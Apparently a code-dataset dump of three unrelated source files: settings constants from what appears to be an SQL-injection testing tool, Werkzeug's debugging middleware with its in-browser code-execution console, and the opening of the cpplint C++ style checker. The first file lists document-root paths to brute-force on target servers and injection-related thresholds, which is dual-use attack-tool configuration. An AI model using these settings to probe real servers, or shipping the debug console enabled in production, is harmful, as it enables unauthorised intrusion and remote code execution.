PARAMETER_SPLITTING_REGEX = r'[,|;]'
# Regular expression describing possible union char value (e.g. used in --union-char)
UNION_CHAR_REGEX = r'\A\w+\Z'
# Attribute used for storing original parameter value in special cases (e.g. POST)
UNENCODED_ORIGINAL_VALUE = 'original'
# Common column names containing usernames (used for hash cracking in some cases)
COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor')
# Default delimiter in GET/POST values
DEFAULT_GET_POST_DELIMITER = '&'
# Default delimiter in cookie values
DEFAULT_COOKIE_DELIMITER = ';'
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
# Skip unforced HashDB flush requests below the threshold number of cached items
HASHDB_FLUSH_THRESHOLD = 32
# Number of retries for unsuccessful HashDB flush attempts
HASHDB_FLUSH_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "cAWxkLYCQT" # r5129 "".join(random.sample(string.ascii_letters, 10))
# Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
# On huge tables there is a considerable slowdown if every row retrieval requires ORDER BY (most noticable in table dumping using ERROR injections)
SLOW_ORDER_COUNT_THRESHOLD = 10000
# Give up on hash recognition if nothing was found in first given number of rows
HASH_RECOGNITION_QUIT_THRESHOLD = 10000
# Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce
MAX_SINGLE_URL_REDIRECTIONS = 4
# Maximum total number of redirections (regardless of URL) - before assuming we're in a loop
MAX_TOTAL_REDIRECTIONS = 10
# Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm
MAX_DNS_LABEL = 63
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
# Alphabet used for heuristic checks
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
# Maximum response total page size (trimmed if larger)
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
# Maximum (multi-threaded) length of entry in bisection algorithm
MAX_BISECTION_LENGTH = 50 * 1024 * 1024
# Mark used for trimming unnecessary content in large chunks
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
# Generic SQL comment formation
GENERIC_SQL_COMMENT = "-- "
# Threshold value for turning back on time auto-adjustment mechanism
VALID_TIME_CHARS_RUN_THRESHOLD = 100
# Check for empty columns only if table is sufficiently large
CHECK_ZERO_COLUMNS_THRESHOLD = 10
# Boldify all logger messages containing these "patterns"
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
# Generic www root directory names
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
# Maximum length of a help part containing switch/option name(s)
MAX_HELP_OPTION_LENGTH = 18
# Maximum number of connection retries (to prevent problems with recursion)
MAX_CONNECT_RETRIES = 100
# Strings for detecting formatting errors
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
# Regular expression used for extracting ASP.NET view state values
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
# Regular expression used for extracting ASP.NET event validation values
EVENTVALIDATION_REGEX = r'(?i)(?P<name>__EVENTVALIDATION[^"]*)[^>]+value="(?P<result>[^"]+)'
# Number of rows to generate inside the full union test for limited output (mustn't be too large to prevent payload length problems)
LIMITED_ROWS_TEST_NUMBER = 15
# Format used for representing invalid unicode characters
INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"
# Regular expression for SOAP-like POST data
SOAP_RECOGNITION_REGEX = r"(?s)\A(<\?xml[^>]+>)?\s*<([^> ]+)( [^>]+)?>.+</\2.*>\s*\Z"
# Regular expression used for detecting JSON-like POST data
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
# Regular expression used for detecting multipart POST data
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
# Default POST data content-type
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
# Raw text POST data content-type
PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8"
# Length used while checking for existence of Suhosin-patch (like) protection mechanism
SUHOSIN_MAX_VALUE_LENGTH = 512
# Minimum size of an (binary) entry before it can be considered for dumping to disk
MIN_BINARY_DISK_DUMP_SIZE = 100
# Regular expression used for extracting form tags
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
# Minimum field entry length needed for encoded content (hex, base64,...) check
MIN_ENCODED_LEN_CHECK = 5
# Timeout in seconds in which Metasploit remote session has to be initialized
METASPLOIT_SESSION_TIMEOUT = 180
# Reference: http://www.cookiecentral.com/faq/#3.5
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
# Prefixes used in brute force search for web server document root
BRUTE_DOC_ROOT_PREFIXES = {
OS.LINUX: ("/var/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
OS.WINDOWS: ("/xampp", "/Program Files/xampp/", "/wamp", "/Program Files/wampp/", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%")
}
# Suffixes used in brute force search for web server document root
BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "sites/all", "www/build")
# String used for marking target name inside used brute force web server document root
BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
# Character used as a boundary in kb.chars (preferably less frequent letter)
KB_CHARS_BOUNDARY_CHAR = 'q'
# CSS style used in HTML dump format
HTML_DUMP_CSS_STYLE = """<style>
table{
margin:10;
background-color:#FFFFFF;
font-family:verdana;
font-size:12px;
align:center;
}
thead{
font-weight:bold;
background-color:#4F81BD;
color:#FFFFFF;
}
tr:nth-child(even) {
background-color: #D3DFEE
}
td{
font-size:10px;
}
th{
font-size:10px;
}
</style>"""
| gpl-2.0 |
Konbonix/DisasterSupplyTracker | lib/werkzeug/debug/__init__.py | 81 | 7867 | # -*- coding: utf-8 -*-
"""
werkzeug.debug
~~~~~~~~~~~~~~
WSGI application traceback debugger.
:copyright: (c) 2011 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import mimetypes
from os.path import join, dirname, basename, isfile
from werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response
from werkzeug.debug.tbtools import get_current_traceback, render_console_html
from werkzeug.debug.console import Console
from werkzeug.security import gen_salt
#: import this here because it once was documented as being available
#: from this module. In case there are users left ...
from werkzeug.debug.repr import debug_repr
class _ConsoleFrame(object):
"""Helper class so that we can reuse the frame console code for the
standalone console.
"""
def __init__(self, namespace):
self.console = Console(namespace)
self.id = 0
class DebuggedApplication(object):
"""Enables debugging support for a given application::
from werkzeug.debug import DebuggedApplication
from myapp import app
app = DebuggedApplication(app, evalex=True)
The `evalex` keyword argument allows evaluating expressions in a
traceback's frame context.
.. versionadded:: 0.7
The `lodgeit_url` parameter was added.
:param app: the WSGI application to run debugged.
:param evalex: enable exception evaluation feature (interactive
debugging). This requires a non-forking server.
:param request_key: The key that points to the request object in ths
environment. This parameter is ignored in current
versions.
:param console_path: the URL for a general purpose console.
:param console_init_func: the function that is executed before starting
the general purpose console. The return value
is used as initial namespace.
:param show_hidden_frames: by default hidden traceback frames are skipped.
You can show them by setting this parameter
to `True`.
:param lodgeit_url: the base URL of the LodgeIt instance to use for
pasting tracebacks.
"""
# this class is public
__module__ = 'werkzeug'
def __init__(self, app, evalex=False, request_key='werkzeug.request',
console_path='/console', console_init_func=None,
show_hidden_frames=False,
lodgeit_url='http://paste.pocoo.org/'):
if not console_init_func:
console_init_func = dict
self.app = app
self.evalex = evalex
self.frames = {}
self.tracebacks = {}
self.request_key = request_key
self.console_path = console_path
self.console_init_func = console_init_func
self.show_hidden_frames = show_hidden_frames
self.lodgeit_url = lodgeit_url
self.secret = gen_salt(20)
def debug_application(self, environ, start_response):
"""Run the application and conserve the traceback frames."""
app_iter = None
try:
app_iter = self.app(environ, start_response)
for item in app_iter:
yield item
if hasattr(app_iter, 'close'):
app_iter.close()
except Exception:
if hasattr(app_iter, 'close'):
app_iter.close()
traceback = get_current_traceback(skip=1, show_hidden_frames=
self.show_hidden_frames,
ignore_system_exceptions=True)
for frame in traceback.frames:
self.frames[frame.id] = frame
self.tracebacks[traceback.id] = traceback
try:
start_response('500 INTERNAL SERVER ERROR', [
('Content-Type', 'text/html; charset=utf-8')
])
except Exception:
# if we end up here there has been output but an error
# occurred. in that situation we can do nothing fancy any
# more, better log something into the error log and fall
# back gracefully.
environ['wsgi.errors'].write(
'Debugging middleware caught exception in streamed '
'response at a point where response headers were already '
'sent.\n')
else:
yield traceback.render_full(evalex=self.evalex,
lodgeit_url=self.lodgeit_url,
secret=self.secret) \
.encode('utf-8', 'replace')
traceback.log(environ['wsgi.errors'])
def execute_command(self, request, command, frame):
"""Execute a command in a console."""
return Response(frame.console.eval(command), mimetype='text/html')
def display_console(self, request):
"""Display a standalone shell."""
if 0 not in self.frames:
self.frames[0] = _ConsoleFrame(self.console_init_func())
return Response(render_console_html(secret=self.secret),
mimetype='text/html')
def paste_traceback(self, request, traceback):
"""Paste the traceback and return a JSON response."""
paste_id = traceback.paste(self.lodgeit_url)
return Response('{"url": "%sshow/%s/", "id": "%s"}'
% (self.lodgeit_url, paste_id, paste_id),
mimetype='application/json')
def get_source(self, request, frame):
"""Render the source viewer."""
return Response(frame.render_source(), mimetype='text/html')
def get_resource(self, request, filename):
"""Return a static resource from the shared folder."""
filename = join(dirname(__file__), 'shared', basename(filename))
if isfile(filename):
mimetype = mimetypes.guess_type(filename)[0] \
or 'application/octet-stream'
f = file(filename, 'rb')
try:
return Response(f.read(), mimetype=mimetype)
finally:
f.close()
return Response('Not Found', status=404)
def __call__(self, environ, start_response):
"""Dispatch the requests."""
# important: don't ever access a function here that reads the incoming
# form data! Otherwise the application won't have access to that data
# any more!
request = Request(environ)
response = self.debug_application
if request.args.get('__debugger__') == 'yes':
cmd = request.args.get('cmd')
arg = request.args.get('f')
secret = request.args.get('s')
traceback = self.tracebacks.get(request.args.get('tb', type=int))
frame = self.frames.get(request.args.get('frm', type=int))
if cmd == 'resource' and arg:
response = self.get_resource(request, arg)
elif cmd == 'paste' and traceback is not None and \
secret == self.secret:
response = self.paste_traceback(request, traceback)
elif cmd == 'source' and frame and self.secret == secret:
response = self.get_source(request, frame)
elif self.evalex and cmd is not None and frame is not None and \
self.secret == secret:
response = self.execute_command(request, cmd, frame)
elif self.evalex and self.console_path is not None and \
request.path == self.console_path:
response = self.display_console(request)
return response(environ, start_response)
| apache-2.0 |
Pulfer/clementine-vkservice | dist/cpplint.py | 23 | 158902 | #!/usr/bin/python
#
# Copyright (c) 2009 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Here are some issues that I've had people identify in my code during reviews,
# that I think are possible to flag automatically in a lint tool. If these were
# caught by lint, it would save time both for myself and that of my reviewers.
# Most likely, some of these are beyond the scope of the current lint framework,
# but I think it is valuable to retain these wish-list items even if they cannot
# be immediately implemented.
#
# Suggestions
# -----------
# - Check for no 'explicit' for multi-arg ctor
# - Check for boolean assign RHS in parens
# - Check for ctor initializer-list colon position and spacing
# - Check that if there's a ctor, there should be a dtor
# - Check accessors that return non-pointer member variables are
# declared const
# - Check accessors that return non-const pointer member vars are
# *not* declared const
# - Check for using public includes for testing
# - Check for spaces between brackets in one-line inline method
# - Check for no assert()
# - Check for spaces surrounding operators
# - Check for 0 in pointer context (should be NULL)
# - Check for 0 in char context (should be '\0')
# - Check for camel-case method name conventions for methods
# that are not simple inline getters and setters
# - Do not indent namespace contents
# - Avoid inlining non-trivial constructors in header files
# - Check for old-school (void) cast for call-sites of functions
# ignored return value
# - Check gUnit usage of anonymous namespace
# - Check for class declaration order (typedefs, consts, enums,
# ctor(s?), dtor, friend declarations, methods, member vars)
#
"""Does google-lint on c++ files.
The goal of this script is to identify places in the code that *may*
be in non-compliance with google style. It does not attempt to fix
up these problems -- the point is to educate. It does also not
attempt to find all problems, or to ensure that everything it does
find is legitimately a problem.
In particular, we can get very confused by /* and // inside strings!
We do a small hack, which is to ignore //'s with "'s after them on the
same line, but it is far from perfect (in either direction).
"""
import codecs
import copy
import getopt
import math # for log
import os
import re
import sre_compile
import string
import sys
import unicodedata
_USAGE = """
Syntax: cpplint.py [--verbose=#] [--output=vs7] [--filter=-x,+y,...]
[--counting=total|toplevel|detailed]
<file> [file] ...
The style guidelines this tries to follow are those in
http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml
Every problem is given a confidence score from 1-5, with 5 meaning we are
certain of the problem, and 1 meaning it could be a legitimate construct.
This will miss some errors, and is not a substitute for a code review.
To suppress false-positive errors of a certain category, add a
'NOLINT(category)' comment to the line. NOLINT or NOLINT(*)
suppresses errors of all categories on that line.
The files passed in will be linted; at least one file must be provided.
Linted extensions are .cc, .cpp, and .h. Other file types will be ignored.
Flags:
output=vs7
By default, the output is formatted to ease emacs parsing. Visual Studio
compatible output (vs7) may also be used. Other formats are unsupported.
verbose=#
Specify a number 0-5 to restrict errors to certain verbosity levels.
filter=-x,+y,...
Specify a comma-separated list of category-filters to apply: only
error messages whose category names pass the filters will be printed.
(Category names are printed with the message and look like
"[whitespace/indent]".) Filters are evaluated left to right.
"-FOO" and "FOO" means "do not print categories that start with FOO".
"+FOO" means "do print categories that start with FOO".
Examples: --filter=-whitespace,+whitespace/braces
--filter=whitespace,runtime/printf,+runtime/printf_format
--filter=-,+build/include_what_you_use
To see a list of all the categories used in cpplint, pass no arg:
--filter=
counting=total|toplevel|detailed
The total number of errors found is always printed. If
'toplevel' is provided, then the count of errors in each of
the top-level categories like 'build' and 'whitespace' will
also be printed. If 'detailed' is provided, then a count
is provided for each category like 'build/class'.
root=subdir
The root directory used for deriving header guard CPP variable.
By default, the header guard CPP variable is calculated as the relative
path to the directory that contains .git, .hg, or .svn. When this flag
is specified, the relative path is calculated from the specified
directory. If the specified directory does not exist, this flag is
ignored.
Examples:
Assuing that src/.git exists, the header guard CPP variables for
src/chrome/browser/ui/browser.h are:
No flag => CHROME_BROWSER_UI_BROWSER_H_
--root=chrome => BROWSER_UI_BROWSER_H_
--root=chrome/browser => UI_BROWSER_H_
"""
# We categorize each error message we print. Here are the categories.
# We want an explicit list so we can list them all in cpplint --filter=.
# If you add a new error message with a new category, add it to the list
# here! cpplint_unittest.py should tell you if you forget to do this.
# \ used for clearer layout -- pylint: disable-msg=C6013
_ERROR_CATEGORIES = [
'build/class',
'build/deprecated',
'build/endif_comment',
'build/explicit_make_pair',
'build/forward_decl',
'build/header_guard',
'build/include',
'build/include_alpha',
'build/include_order',
'build/include_what_you_use',
'build/namespaces',
'build/printf_format',
'build/storage_class',
'legal/copyright',
'readability/alt_tokens',
'readability/braces',
'readability/casting',
'readability/check',
'readability/constructors',
'readability/fn_size',
'readability/function',
'readability/multiline_comment',
'readability/multiline_string',
'readability/namespace',
'readability/nolint',
'readability/streams',
'readability/todo',
'readability/utf8',
'runtime/arrays',
'runtime/casting',
'runtime/explicit',
'runtime/int',
'runtime/init',
'runtime/invalid_increment',
'runtime/member_string_references',
'runtime/memset',
'runtime/operator',
'runtime/printf',
'runtime/printf_format',
'runtime/references',
'runtime/rtti',
'runtime/sizeof',
'runtime/string',
'runtime/threadsafe_fn',
'whitespace/blank_line',
'whitespace/braces',
'whitespace/comma',
'whitespace/comments',
'whitespace/empty_loop_body',
'whitespace/end_of_line',
'whitespace/ending_newline',
'whitespace/forcolon',
'whitespace/indent',
'whitespace/labels',
'whitespace/line_length',
'whitespace/newline',
'whitespace/operators',
'whitespace/parens',
'whitespace/semicolon',
'whitespace/tab',
'whitespace/todo'
]
# The default state of the category filter. This is overrided by the --filter=
# flag. By default all errors are on, so only add here categories that should be
# off by default (i.e., categories that must be enabled by the --filter= flags).
# All entries here should start with a '-' or '+', as in the --filter= flag.
_DEFAULT_FILTERS = ['-build/include_alpha']
# We used to check for high-bit characters, but after much discussion we
# decided those were OK, as long as they were in UTF-8 and didn't represent
# hard-coded international strings, which belong in a separate i18n file.
# Headers that we consider STL headers.
_STL_HEADERS = frozenset([
'algobase.h', 'algorithm', 'alloc.h', 'bitset', 'deque', 'exception',
'function.h', 'functional', 'hash_map', 'hash_map.h', 'hash_set',
'hash_set.h', 'iterator', 'list', 'list.h', 'map', 'memory', 'new',
'pair.h', 'pthread_alloc', 'queue', 'set', 'set.h', 'sstream', 'stack',
'stl_alloc.h', 'stl_relops.h', 'type_traits.h',
'utility', 'vector', 'vector.h',
])
# Non-STL C++ system headers.
_CPP_HEADERS = frozenset([
'algo.h', 'builtinbuf.h', 'bvector.h', 'cassert', 'cctype',
'cerrno', 'cfloat', 'ciso646', 'climits', 'clocale', 'cmath',
'complex', 'complex.h', 'csetjmp', 'csignal', 'cstdarg', 'cstddef',
'cstdio', 'cstdlib', 'cstring', 'ctime', 'cwchar', 'cwctype',
'defalloc.h', 'deque.h', 'editbuf.h', 'exception', 'fstream',
'fstream.h', 'hashtable.h', 'heap.h', 'indstream.h', 'iomanip',
'iomanip.h', 'ios', 'iosfwd', 'iostream', 'iostream.h', 'istream',
'istream.h', 'iterator.h', 'limits', 'map.h', 'multimap.h', 'multiset.h',
'numeric', 'ostream', 'ostream.h', 'parsestream.h', 'pfstream.h',
'PlotFile.h', 'procbuf.h', 'pthread_alloc.h', 'rope', 'rope.h',
'ropeimpl.h', 'SFile.h', 'slist', 'slist.h', 'stack.h', 'stdexcept',
'stdiostream.h', 'streambuf', 'streambuf.h', 'stream.h', 'strfile.h',
'string', 'strstream', 'strstream.h', 'tempbuf.h', 'tree.h', 'typeinfo',
'valarray',
])
# Assertion macros. These are defined in base/logging.h and
# testing/base/gunit.h. Note that the _M versions need to come first
# for substring matching to work.
_CHECK_MACROS = [
'DCHECK', 'CHECK',
'EXPECT_TRUE_M', 'EXPECT_TRUE',
'ASSERT_TRUE_M', 'ASSERT_TRUE',
'EXPECT_FALSE_M', 'EXPECT_FALSE',
'ASSERT_FALSE_M', 'ASSERT_FALSE',
]
# Replacement macros for CHECK/DCHECK/EXPECT_TRUE/EXPECT_FALSE
_CHECK_REPLACEMENT = dict([(m, {}) for m in _CHECK_MACROS])
for op, replacement in [('==', 'EQ'), ('!=', 'NE'),
('>=', 'GE'), ('>', 'GT'),
('<=', 'LE'), ('<', 'LT')]:
_CHECK_REPLACEMENT['DCHECK'][op] = 'DCHECK_%s' % replacement
_CHECK_REPLACEMENT['CHECK'][op] = 'CHECK_%s' % replacement
_CHECK_REPLACEMENT['EXPECT_TRUE'][op] = 'EXPECT_%s' % replacement
_CHECK_REPLACEMENT['ASSERT_TRUE'][op] = 'ASSERT_%s' % replacement
_CHECK_REPLACEMENT['EXPECT_TRUE_M'][op] = 'EXPECT_%s_M' % replacement
_CHECK_REPLACEMENT['ASSERT_TRUE_M'][op] = 'ASSERT_%s_M' % replacement
for op, inv_replacement in [('==', 'NE'), ('!=', 'EQ'),
('>=', 'LT'), ('>', 'LE'),
('<=', 'GT'), ('<', 'GE')]:
_CHECK_REPLACEMENT['EXPECT_FALSE'][op] = 'EXPECT_%s' % inv_replacement
_CHECK_REPLACEMENT['ASSERT_FALSE'][op] = 'ASSERT_%s' % inv_replacement
_CHECK_REPLACEMENT['EXPECT_FALSE_M'][op] = 'EXPECT_%s_M' % inv_replacement
_CHECK_REPLACEMENT['ASSERT_FALSE_M'][op] = 'ASSERT_%s_M' % inv_replacement
# Alternative tokens and their replacements. For full list, see section 2.5
# Alternative tokens [lex.digraph] in the C++ standard.
#
# Digraphs (such as '%:') are not included here since it's a mess to
# match those on a word boundary.
_ALT_TOKEN_REPLACEMENT = {
'and': '&&',
'bitor': '|',
'or': '||',
'xor': '^',
'compl': '~',
'bitand': '&',
'and_eq': '&=',
'or_eq': '|=',
'xor_eq': '^=',
'not': '!',
'not_eq': '!='
}
# Compile regular expression that matches all the above keywords. The "[ =()]"
# bit is meant to avoid matching these keywords outside of boolean expressions.
#
# False positives include C-style multi-line comments (http://go/nsiut )
# and multi-line strings (http://go/beujw ), but those have always been
# troublesome for cpplint.
_ALT_TOKEN_REPLACEMENT_PATTERN = re.compile(
r'[ =()](' + ('|'.join(_ALT_TOKEN_REPLACEMENT.keys())) + r')(?=[ (]|$)')
# These constants define types of headers for use with
# _IncludeState.CheckNextIncludeOrder().
_C_SYS_HEADER = 1
_CPP_SYS_HEADER = 2
_LIKELY_MY_HEADER = 3
_POSSIBLE_MY_HEADER = 4
_OTHER_HEADER = 5
# These constants define the current inline assembly state
_NO_ASM = 0 # Outside of inline assembly block
_INSIDE_ASM = 1 # Inside inline assembly block
_END_ASM = 2 # Last line of inline assembly block
_BLOCK_ASM = 3 # The whole block is an inline assembly block
# Match start of assembly blocks
_MATCH_ASM = re.compile(r'^\s*(?:asm|_asm|__asm|__asm__)'
r'(?:\s+(volatile|__volatile__))?'
r'\s*[{(]')
_regexp_compile_cache = {}
# Finds occurrences of NOLINT or NOLINT(...).
_RE_SUPPRESSION = re.compile(r'\bNOLINT\b(\([^)]*\))?')
# {str, set(int)}: a map from error categories to sets of linenumbers
# on which those errors are expected and should be suppressed.
_error_suppressions = {}
# The root directory used for deriving header guard CPP variable.
# This is set by --root flag.
_root = None
def ParseNolintSuppressions(filename, raw_line, linenum, error):
"""Updates the global list of error-suppressions.
Parses any NOLINT comments on the current line, updating the global
error_suppressions store. Reports an error if the NOLINT comment
was malformed.
Args:
filename: str, the name of the input file.
raw_line: str, the line of input text, with comments.
linenum: int, the number of the current line.
error: function, an error handler.
"""
# FIXME(adonovan): "NOLINT(" is misparsed as NOLINT(*).
matched = _RE_SUPPRESSION.search(raw_line)
if matched:
category = matched.group(1)
if category in (None, '(*)'): # => "suppress all"
_error_suppressions.setdefault(None, set()).add(linenum)
else:
if category.startswith('(') and category.endswith(')'):
category = category[1:-1]
if category in _ERROR_CATEGORIES:
_error_suppressions.setdefault(category, set()).add(linenum)
else:
error(filename, linenum, 'readability/nolint', 5,
'Unknown NOLINT error category: %s' % category)
def ResetNolintSuppressions():
"Resets the set of NOLINT suppressions to empty."
_error_suppressions.clear()
def IsErrorSuppressedByNolint(category, linenum):
"""Returns true if the specified error category is suppressed on this line.
Consults the global error_suppressions map populated by
ParseNolintSuppressions/ResetNolintSuppressions.
Args:
category: str, the category of the error.
linenum: int, the current line number.
Returns:
bool, True iff the error should be suppressed due to a NOLINT comment.
"""
return (linenum in _error_suppressions.get(category, set()) or
linenum in _error_suppressions.get(None, set()))
def Match(pattern, s):
"""Matches the string with the pattern, caching the compiled regexp."""
# The regexp compilation caching is inlined in both Match and Search for
# performance reasons; factoring it out into a separate function turns out
# to be noticeably expensive.
if not pattern in _regexp_compile_cache:
_regexp_compile_cache[pattern] = sre_compile.compile(pattern)
return _regexp_compile_cache[pattern].match(s)
def Search(pattern, s):
"""Searches the string for the pattern, caching the compiled regexp."""
if not pattern in _regexp_compile_cache:
_regexp_compile_cache[pattern] = sre_compile.compile(pattern)
return _regexp_compile_cache[pattern].search(s)
class _IncludeState(dict):
"""Tracks line numbers for includes, and the order in which includes appear.
As a dict, an _IncludeState object serves as a mapping between include
filename and line number on which that file was included.
Call CheckNextIncludeOrder() once for each header in the file, passing
in the type constants defined above. Calls in an illegal order will
raise an _IncludeError with an appropriate error message.
"""
# self._section will move monotonically through this set. If it ever
# needs to move backwards, CheckNextIncludeOrder will raise an error.
_INITIAL_SECTION = 0
_MY_H_SECTION = 1
_C_SECTION = 2
_CPP_SECTION = 3
_OTHER_H_SECTION = 4
_TYPE_NAMES = {
_C_SYS_HEADER: 'C system header',
_CPP_SYS_HEADER: 'C++ system header',
_LIKELY_MY_HEADER: 'header this file implements',
_POSSIBLE_MY_HEADER: 'header this file may implement',
_OTHER_HEADER: 'other header',
}
_SECTION_NAMES = {
_INITIAL_SECTION: "... nothing. (This can't be an error.)",
_MY_H_SECTION: 'a header this file implements',
_C_SECTION: 'C system header',
_CPP_SECTION: 'C++ system header',
_OTHER_H_SECTION: 'other header',
}
def __init__(self):
dict.__init__(self)
# The name of the current section.
self._section = self._INITIAL_SECTION
# The path of last found header.
self._last_header = ''
def CanonicalizeAlphabeticalOrder(self, header_path):
"""Returns a path canonicalized for alphabetical comparison.
- replaces "-" with "_" so they both cmp the same.
- removes '-inl' since we don't require them to be after the main header.
- lowercase everything, just in case.
Args:
header_path: Path to be canonicalized.
Returns:
Canonicalized path.
"""
return header_path.replace('-inl.h', '.h').replace('-', '_').lower()
def IsInAlphabeticalOrder(self, header_path):
"""Check if a header is in alphabetical order with the previous header.
Args:
header_path: Header to be checked.
Returns:
Returns true if the header is in alphabetical order.
"""
canonical_header = self.CanonicalizeAlphabeticalOrder(header_path)
if self._last_header > canonical_header:
return False
self._last_header = canonical_header
return True
def CheckNextIncludeOrder(self, header_type):
"""Returns a non-empty error message if the next header is out of order.
This function also updates the internal state to be ready to check
the next include.
Args:
header_type: One of the _XXX_HEADER constants defined above.
Returns:
The empty string if the header is in the right order, or an
error message describing what's wrong.
"""
error_message = ('Found %s after %s' %
(self._TYPE_NAMES[header_type],
self._SECTION_NAMES[self._section]))
last_section = self._section
if header_type == _C_SYS_HEADER:
if self._section <= self._C_SECTION:
self._section = self._C_SECTION
else:
self._last_header = ''
return error_message
elif header_type == _CPP_SYS_HEADER:
if self._section <= self._CPP_SECTION:
self._section = self._CPP_SECTION
else:
self._last_header = ''
return error_message
elif header_type == _LIKELY_MY_HEADER:
if self._section <= self._MY_H_SECTION:
self._section = self._MY_H_SECTION
else:
self._section = self._OTHER_H_SECTION
elif header_type == _POSSIBLE_MY_HEADER:
if self._section <= self._MY_H_SECTION:
self._section = self._MY_H_SECTION
else:
# This will always be the fallback because we're not sure
# enough that the header is associated with this file.
self._section = self._OTHER_H_SECTION
else:
assert header_type == _OTHER_HEADER
self._section = self._OTHER_H_SECTION
if last_section != self._section:
self._last_header = ''
return ''
class _CppLintState(object):
"""Maintains module-wide state.."""
def __init__(self):
self.verbose_level = 1 # global setting.
self.error_count = 0 # global count of reported errors
# filters to apply when emitting error messages
self.filters = _DEFAULT_FILTERS[:]
self.counting = 'total' # In what way are we counting errors?
self.errors_by_category = {} # string to int dict storing error counts
# output format:
# "emacs" - format that emacs can parse (default)
# "vs7" - format that Microsoft Visual Studio 7 can parse
self.output_format = 'emacs'
def SetOutputFormat(self, output_format):
"""Sets the output format for errors."""
self.output_format = output_format
def SetVerboseLevel(self, level):
"""Sets the module's verbosity, and returns the previous setting."""
last_verbose_level = self.verbose_level
self.verbose_level = level
return last_verbose_level
def SetCountingStyle(self, counting_style):
"""Sets the module's counting options."""
self.counting = counting_style
def SetFilters(self, filters):
"""Sets the error-message filters.
These filters are applied when deciding whether to emit a given
error message.
Args:
filters: A string of comma-separated filters (eg "+whitespace/indent").
Each filter should start with + or -; else we die.
Raises:
ValueError: The comma-separated filters did not all start with '+' or '-'.
E.g. "-,+whitespace,-whitespace/indent,whitespace/badfilter"
"""
# Default filters always have less priority than the flag ones.
self.filters = _DEFAULT_FILTERS[:]
for filt in filters.split(','):
clean_filt = filt.strip()
if clean_filt:
self.filters.append(clean_filt)
for filt in self.filters:
if not (filt.startswith('+') or filt.startswith('-')):
raise ValueError('Every filter in --filters must start with + or -'
' (%s does not)' % filt)
def ResetErrorCounts(self):
"""Sets the module's error statistic back to zero."""
self.error_count = 0
self.errors_by_category = {}
